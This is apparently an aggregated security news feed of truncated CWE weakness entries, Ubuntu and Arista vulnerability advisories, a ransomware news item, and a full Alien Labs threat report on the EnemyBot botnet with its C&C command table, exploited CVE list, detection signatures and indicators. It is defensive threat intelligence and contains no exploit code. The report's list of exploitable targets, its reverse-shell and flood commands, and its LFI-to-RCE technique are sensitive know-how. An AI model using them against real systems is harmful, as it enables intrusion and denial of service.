CWE-29 – Path Traversal: ‘..filename’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘..filename’ (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity:…
-
CWE-290 – Authentication Bypass by Spoofing
Description This attack-focused weakness is caused by improperly implemented authentication schemes that are subject to spoofing attacks. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-287 Consequences Access Control: Bypass Protection Mechanism, Gain Privileges or Assume Identity This weakness can allow an attacker to access resources which are not otherwise…
-
CWE-291 – Reliance on IP Address for Authentication
Description The software uses an IP address for authentication. IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the…
-
CWE-292 – DEPRECATED: Trusting Self-reported DNS Name
Description This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350. Modes of Introduction: Related Weaknesses Consequences Potential Mitigations CVE References
-
CWE-293 – Using Referer Field for Authentication
Description The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking. The referer field in HTML requests can be simply modified by malicious users, rendering it useless as a means of checking the validity of the request in question. Modes of Introduction: –…
-
CWE-294 – Authentication Bypass by Capture-replay
Description A capture-replay flaw exists when the design of the software makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes). Capture-replay attacks are common and can be difficult to defeat…
-
CWE-295 – Improper Certificate Validation
Description The software does not validate, or incorrectly validates, a certificate. When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The software might connect to a malicious host while believing it is a trusted host, or…
-
CWE-296 – Improper Following of a Certificate’s Chain of Trust
Description The software does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Low Related Weaknesses CWE-295 CWE-573 Consequences Non-Repudiation:…
USN-5450-1: Subversion vulnerabilities
Evgeny Kotkov discovered that subversion servers did not properly follow
path-based authorization rules in certain cases. An attacker could
potentially use this issue to retrieve information about private paths.
(CVE-2021-28544)
Thomas Weißschuh discovered that subversion servers did not properly handle
memory in certain configurations. A remote attacker could potentially use
this issue to cause a denial of service or other unspecified impact.
(CVE-2022-24070)
New Linux-based ransomware targets VMware servers
Researchers at Trend Micro have discovered some new Linux-based ransomware that’s being used to attack VMware ESXi servers, a bare-metal hypervisor for creating and running several virtual machines (VMs) that share the same hard drive storage. Called Cheerscrypt, the bad app is following in the footsteps of other ransomware programs—such as LockBit, Hive and RansomEXX—that have found ESXi an efficient way to infect many computers at once with malicious payloads.
Roger Grimes, a defense evangelist with security awareness training provider KnowBe4, explains that most of the world’s organizations operate using VMware virtual machines. “It makes the job of ransomware attackers far easier because they can encrypt one server—the VMware server—and then encrypt every guest VM it contains. One compromise and encryption command can easily encrypt dozens to hundreds of other virtually run computers all at once.”
Rapidly evolving IoT malware EnemyBot now targeting Content Management System servers and Android devices
Executive summary
AT&T Alien Labs™ has been tracking a new IoT botnet dubbed “EnemyBot”, which is believed to be distributed by threat actor Keksec. During our investigations, Alien Labs has discovered that EnemyBot is expanding its capabilities, exploiting recently identified vulnerabilities (2022), and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers. In addition, the malware base source code can now be found online on Github, making it widely accessible.
Key takeaways:
EnemyBot’s base source code can be found on Github, making it available to anyone who wants to leverage the malware in their attacks.
The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities.
Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.
The threat group behind EnemyBot, Keksec, is well-resourced and has the ability to update and add new capabilities to its arsenal of malware on a daily basis (see below for more detail on Keksec)
Background
First discovered by Securonix in March 2022 and later detailed in an in-depth analysis by Fortinet, EnemyBot is a new malware distributed by the threat actor “Keksec” targeting Linux machines and IoT devices.
According to the malware Github’s repository, EnemyBot derives its source code from multiple botnets to a powerful and more adjustable malware. The original botnet code that EnemyBot is using includes: Mirai, Qbot, and Zbot. In addition, the malware includes custom development (see figure 1).
Figure 1. EnemyBot page on Github.
The Keksec threat group is reported to have formed back in 2016 by a number of experienced botnet actors. In November 2021, researchers from Qihoo 360 described in detail the threat actor’s activity in a presentation, attributing to the Keksec the development of botnets for different platforms including Windows and Linux:
Linux based botnets: Tsunami and Gafgyt
Windows based botnets: DarkIRC, DarkHTTP
Dual systems: Necro (developed in Python)
Source code analysis
The developer of the Github page on EnemyBot self describes as a “full time malware dev,” that is also available for contract work. The individual states their workplace as “Kek security,” implying a potential relationship with the broader Keksec group (see figure 2).
Figure 2. EnemyBot developer description.
The malware repository on Github contains four main sections:
cc7.py
This module is a Python script file that downloads all dependencies and compiles the malware into different OS architectures including x86, ARM, macOS, OpenBSD, PowerPC, MIPS, and more (see figure 3)
Figure 3. Compiling malware source code to macOS executable.
Once compilation is complete, the script then creates a batch file ‘update.sh’ which is used by the bot as a downloader that is then delivered to any identified vulnerable targets to spread the malware.
Figure 4. Generated `update.sh` file to spread EnemyBot on different architectures.
enemy.c
This is the main bot source code. Though it is missing the main exploitation function, it includes all other functionality of the malware and the attacks the bot supports by mixing the various botnet source codes as mentioned above (Mirai, Qbot, and Zbot) — mainly Mirai and Qbot (see figure 5).
Figure 5. EnemyBot source code.
hide.c
This module is compiled and manually executed to encode / decode the malware’s strings by the attacker to hide strings in binary. For that, the malware is using a simple swap table, in which each char is replaced with a corresponding char in the table (see in figure 6).
Figure 6. String decode.
servertor.c
Figure 7 shows the command-and-control component (C&C) botnet controller. C&C will be executed on a dedicated machine that is controlled by the attacker. It can control and send commands to infected machines. (figure 7)
Figure 7. C&C component.
New variant analysis
Most of EnemyBot functionality relates to the malware’s spreading capabilities, as well as its ability to scan public-facing assets and look for vulnerable devices. However, the malware also has DDoS capabilities and can receive commands to download and execute new code (modules) from its operators that give the malware more functionality.
In new variants of EnemyBot, the malware added a webscan function containing a total of 24 exploits to attack vulnerabilities of different devices and web servers (see figure 8).
Figure 8. EnemyBot calls for a new function “webscan_xywz”.
To perform these functions, the malware randomly scans IP addresses and when it gets a response via SYN/ACK, EnemyBot then scans for vulnerabilities on the remote server by executing multiple exploits.
The first exploit is for the Log4j vulnerability discovered last year as CVE-2021-44228 and CVE-2021-45046:
Figure 9. Exploiting the Log4J vulnerability.
The malware also can adopt new vulnerabilities within days of those vulnerabilities being discovered. Some examples are Razer Sila (April 2022) which was published without a CVE (see figure 10) and a remote code execution (RCE) vulnerability impacting VMWare Workspace ONE with CVE-2022-22954 the same month (see figure 11).
Figure 10. Exploiting vulnerability in Razar Sila.
Figure 11. Exploiting vulnerability in VMWare Workspace ONE.
EnemyBot has also begun targeting content management systems (e.g. WordPress) by searching for vulnerabilities in various plugins, such as “Video Synchro PDF” (see figure 12).
Figure 12. EnemyBot targeting WordPress servers.
In the example shown in figure 12, notice that the malware elevates a local file inclusion (LFI) vulnerability into a RCE by injecting malicious code into the ‘/proc/self/environ’. This method is not new and was described in 2009. The malware uses LFI to call ‘environ’ and passes the shell command in the user agent http header.
Another example of how the malware uses this method is shown in figure 13. In this example the malware is exploiting a vulnerability in DBltek GoIP.
Figure 13. Executing shell command through LFI vulnerability in DBltek.
After infection, EnemyBot will wait for further commands from its C&C. However, in parallel it will also further propogate by scanning for additional vulnerable devices. Alien Labs has listed below the commands the bot can receive from its C&C (accurate as of the publishing of this article).
In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command. (figure 14)
Figure 14. EnemyBot “adb_infect” function to attack Android devices.
Command
Action
SH
Execute shell command
PING
Ping to server, wait for command
LDSERVER
Change loader server for payload.
TCPON
Turn on sniffer.
RSHELL
Create a reverse shell on an infected machine.
TCPOFF
Turn off sniffer.
UDP
Start UDP flood attack.
TCP
Start TCP flood attack.
HTTP
Start HTTP flood attack.
HOLD
Start TCP connection flooder.
TLS
Start TLS attack, start handshake without closing the socket.
STD
Start non spoofed UDP flooder.
DNS
Start DNS flooder.
SCANNER ON | OFF
Start/Stop scanner – scan and infect vulnerable devices.
OVH
Start DDos attack on OVH.
BLACKNURSE
Start ICMP flooder.
STOP
Stop ongoing attacks. kill child processes
ARK
Start targeted attack on ARK: Survivor Evolved video game server.
ADNS
Receive targets list from C&C and start DNS attack.
ASSDP
Start SSDP flood attack.
We have also listed the current vulnerabilities EnemyBot uses. As mentioned, some of them have not been assigned a CVE yet. (As of the publishing of this article.)
CVE Number
Affected devices
CVE-2021-44228, CVE-2021-45046
Log4J RCE
CVE-2022-1388
F5 BIG IP RCE
No CVE (vulnerability published on 2022-02)
Adobe ColdFusion 11 RCE
CVE-2020-7961
Liferay Portal – Java Unmarshalling via JSONWS RCE
No CVE (vulnerability published on 2022-04)
PHP Scriptcase 9.7 RCE
CVE-2021-4039
Zyxel NWA-1100-NH Command injection
No CVE (vulnerability published on 2022-04)
Razar Sila – Command injection
CVE-2022-22947
Spring Cloud Gateway – Code injection vulnerability
CVE-2022-22954
VMWare Workspace One RCE
CVE-2021-36356, CVE-2021-35064
Kramer VIAware RCE
No CVE (vulnerability published on 2022-03)
WordPress Video Synchro PDF plugin LFI
No CVE (vulnerability published on 2022-02)
Dbltek GoIP LFI
No CVE(vulnerability published on 2022-03)
WordPress Cab Fare Calculator plugin LFI
No CVE(vulnerability published on 2022-03)
Archeevo 5.0 LFI
CVE-2018-16763
Fuel CMS 1.4.1 RCE
CVE-2020-5902
F5 BigIP RCE
No CVE (vulnerability published on 2019)
ThinkPHP 5.X RCE
No CVE (vulnerability published on 2017)
Netgear DGN1000 1.1.00.48 ‘Setup.cgi’ RCE
CVE-2022-25075
TOTOLink A3000RU command injection vulnerability
CVE-2015-2051
D-Link devices – HNAP SOAPAction – Header command injection vulnerability
CVE-2014-9118
ZHOME < S3.0.501 RCE
CVE-2017-18368
Zyxel P660HN – unauthenticated command injection
CVE-2020-17456
Seowon SLR 120 router RCE
CVE-2018-10823
D-Link DWR command injection in various models
Recommended actions
Maintain minimal exposure to the Internet on Linux servers and IoT devices and use a properly configured firewall.
Enable automatic updates to ensure your software has the latest security updates.
Monitor network traffic, outbound port scans, and unreasonable bandwidth usage.
Conclusion
Keksec’s EnemyBot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers. The malware can quickly adopt one-day vulnerabilities (within days of a published proof of concept). This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.
Detection methods
The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research.
SURICATA IDS SIGNATURES
Log4j sids: 2018202, 2018203, 2034647, 2034648, 2034649, 2034650, 2034651, 2034652, 2034653, 2034654, 2034655, 2034656, 2034657, 2034658, 2034659, 2034660, 2034661, 2034662, 2034663, 2034664, 2034665, 2034666, 2034667, 2034668, 2034671, 2034672, 2034673, 2034674, 2034676, 2034699, 2034700, 2034701, 2034702, 2034703, 2034706, 2034707, 2034708, 2034709, 2034710, 2034711, 2034712, 2034713, 2034714, 2034715, 2034716, 2034717, 2034723, 2034743, 2034744, 2034747, 2034748, 2034749, 2034750, 2034751, 2034755, 2034757, 2034758, 2034759, 2034760, 2034761, 2034762, 2034763, 2034764, 2034765, 2034766, 2034767, 2034768, 2034781, 2034782, 2034783, 2034784, 2034785, 2034786, 2034787, 2034788, 2034789, 2034790, 2034791, 2034792, 2034793, 2034794, 2034795, 2034796, 2034797, 2034798, 2034799, 2034800, 2034801, 2034802, 2034803, 2034804, 2034805, 2034806, 2034807, 2034808, 2034809, 2034810, 2034811, 2034819, 2034820, 2034831, 2034834, 2034835, 2034836, 2034839, 2034886, 2034887, 2034888, 2034889, 2034890, 2838340, 2847596, 4002714, 4002715
4001913: AV EXPLOIT LifeRay RCE (CVE-2020-7961)
4001943: AV EXPLOIT Liferay Portal Java Unmarshalling RCE (CVE-2020-7961)
4002589: AV EXPLOIT LifeRay Remote Code Execution – update-column (CVE-2020-7961)
2031318: ET CURRENT_EVENTS 401TRG Liferay RCE (CVE-2020-7961)
2031592: ET WEB_SPECIFIC_APPS Liferay Unauthenticated RCE via JSONWS Inbound (CVE-2020-7961)
2035955: ET EXPLOIT Razer Sila Router – Command Injection Attempt Inbound (No CVE)
2035956: ET EXPLOIT Razer Sila Router – LFI Attempt Inbound (No CVE)
2035380: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-2294) (set)
2035381: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-2294)
2035876: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)
2035875: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)
2035874: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)
2036416: ET EXPLOIT Possible VMware Workspace ONE Access RCE via Server-Side Template Injection Inbound (CVE-2022-22954)
4002364: AV EXPLOIT Fuel CMS RCE (CVE-2018-16763)
2030469: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M1
2030483: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M2
2836503: ETPRO EXPLOIT Attempted THINKPHP < 5.2.x RCE Inbound
2836504: ETPRO EXPLOIT Attempted THINKPHP < 5.2.x RCE Outbound
2836633: ETPRO EXPLOIT BlackSquid Failed ThinkPHP Payload Inbound
2026731: ET WEB_SERVER ThinkPHP RCE Exploitation Attempt
2024916: ET EXPLOIT Netgear DGN Remote Command Execution
2029215: ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
2034576: ET EXPLOIT Netgear DGN Remote Code Execution
2035746: ET EXPLOIT Totolink – Command Injection Attempt Inbound (CVE-2022-25075)
4001488: AV TROJAN Mirai Outbound Exploit Scan, D-Link HNAP RCE (CVE-2015-2051)
2034491: ET EXPLOIT D-Link HNAP SOAPAction Command Injection (CVE-2015-2051)
4000095: AV EXPLOIT Unauthenticated Command Injection (ZyXEL P660HN-T v1)
4002327: AV TROJAN Mirai faulty Zyxel exploit attempt
2027092: ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE
4002226: AV EXPLOIT Seowon Router RCE (CVE-2020-17456)
2035950: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M1 (CVE-2020-17456)
2035951: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M2 (CVE-2020-17456)
2035953: ET EXPLOIT D-Link DWR Command Injection Inbound (CVE-2018-10823)
AGENT SIGNATURES
Java Process Spawning Scripting Process
Java Process Spawning WMIC
Java Process Spawning Scripting Process via Commandline (For Jenkins servers)
Suspicious process executed by Jenkins Groovy scripts (For Jenkins servers)
Suspicious command executed by a Java listening process (For Linux servers)
Associated indicators (IOCs)
The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the report.
TYPE
INDICATOR
DESCRIPTION
IP ADDRESS
80.94.92[.]38
Malware C&C
SHA256
7c0fe3841af72d55b55bc248167665da5a9036c972acb9a9ac0a7a21db016cc6
Malware hash
SHA256
2abf6060c8a61d7379adfb8218b56003765c1a1e701b346556ca5d53068892a5
Malware hash
SHA256
7785efeeb495ab10414e1f7e4850d248eddce6be91738d515e8b90d344ed820d
Malware hash
SHA256
8e711f38a80a396bd4dacef1dc9ff6c8e32b9b6d37075cea2bbef6973deb9e68
Malware hash
SHA256
31a9c513a5292912720a4bcc6bd4918fc7afcd4a0b60ef9822f5c7bd861c19b8
Malware hash
SHA256
139e1b14d3062881849eb2dcfe10b96ee3acdbd1387de82e73da7d3d921ed806
Malware hash
SHA256
4bd6e530db1c7ed7610398efa249f9c236d7863b40606d779519ac4ccb89767f
Malware hash
SHA256
7a2a5da50e87bb413375ecf12b0be71aea4e21120c0c2447d678ef73c88b3ba0
Malware hash
SHA256
ab203b50226f252c6b3ce2dd57b16c3a22033cd62a42076d09c9b104f67a3bc9
Malware hash
SHA256
70674c30ed3cf8fc1f8a2b9ecc2e15022f55ab9634d70ea3ba5e2e96cc1e00a0
Malware hash
SHA256
f4f9252eac23bbadcbd3cf1d1cada375cb839020ccb0a4e1c49c86a07ce40e1e
Malware hash
SHA256
6a7242683122a3d4507bb0f0b6e7abf8acef4b5ab8ecf11c4b0ebdbded83e7aa
Malware hash
SHA256
b63e841ded736bca23097e91f1f04d44a3f3fdd98878e9ef2a015a09950775c8
Malware hash
SHA256
4869c3d443bae76b20758f297eb3110e316396e17d95511483b99df5e7689fa0
Malware hash
SHA256
cdf2c0c68b5f8f20af448142fd89f5980c9570033fe2e9793a15fdfdadac1281
Malware hash
Mapped to MITRE ATT&CK
The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:
TA0001: Initial Access:
T1190: Exploit Public-Facing Application
TA0008: Lateral Movement:
T1210: Exploitation of Remote Services
T1021: Remote Services
TA0011: Command and Control
T1132: Data Encoding
T1001: Data Obfuscation
T1030: Proxy:
003: Multi-hop Proxy
CVE-2021-28509
This advisory documents the impact of an internally found vulnerability in Arista EOS state streaming telemetry agent TerminAttr and OpenConfig transport protocols. The impact of this vulnerability is that, in certain conditions, TerminAttr might leak MACsec sensitive data in clear text in CVP to other authorized users, which could cause MACsec traffic to be decrypted or modified by other authorized users on the device.
CVE-2021-28508
This advisory documents the impact of an internally found vulnerability in Arista EOS state streaming telemetry agent TerminAttr and OpenConfig transport protocols. The impact of this vulnerability is that, in certain conditions, TerminAttr might leak IPsec sensitive data in clear text in CVP to other authorized users, which could cause IPsec traffic to be decrypted or modified by other authorized users on the device.
CWE-69 – Improper Handling of Windows ::DATA Alternate Data Stream
Description
The software does not properly prevent access to, or detect usage of, alternate data streams (ADS).
An attacker can use an ADS to hide information about a file (e.g. size, the name of the process) from a system or file browser tools such as Windows Explorer and ‘dir’ at the command line utility. Alternately, the attacker might be able to bypass intended access restrictions for the associated data fork.
Alternate data streams (ADS) were first implemented in the Windows NT operating system to provide compatibility between NTFS and the Macintosh Hierarchical File System (HFS). In HFS, data and resource forks are used to store information about a file. The data fork provides information about the contents of the file while the resource fork stores metadata such as file type.
Modes of Introduction:
– Architecture and Design
Related Weaknesses
Consequences
Access Control, Non-Repudiation, Other: Bypass Protection Mechanism, Hide Activities, Other
Potential Mitigations
Phase: Testing
Description:
Software tools are capable of finding ADSs on your system.
Phase: Implementation
Description:
Ensure that the source code correctly parses the filename to read or write to the correct stream.
CVE References
- CVE-1999-0278
- In IIS, remote attackers can obtain source code for ASP files by appending “::$DATA” to the URL.
- CVE-2000-0927
- Product does not properly record file sizes if they are stored in alternative data streams, which allows users to bypass quota restrictions.
CWE-689 – Permission Race Condition During Resource Copy
Description
The product, while copying or cloning a resource, does not set the resource’s permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place.
Modes of Introduction:
– Implementation
Related Weaknesses
Consequences
Confidentiality, Integrity: Read Application Data, Modify Application Data
Potential Mitigations
CVE References
- CVE-2002-0760
- Archive extractor decompresses files with world-readable permissions, then later sets permissions to what the archive specified.
- CVE-2005-2174
- Product inserts a new object into database before setting the object’s permissions, introducing a race condition.
- CVE-2006-5214
- Error file has weak permissions before a chmod is performed.
- CVE-2005-2475
- Archive permissions issue using hard link.
- CVE-2003-0265
- Database product creates files world-writable before initializing the setuid bits, leading to modification of executables.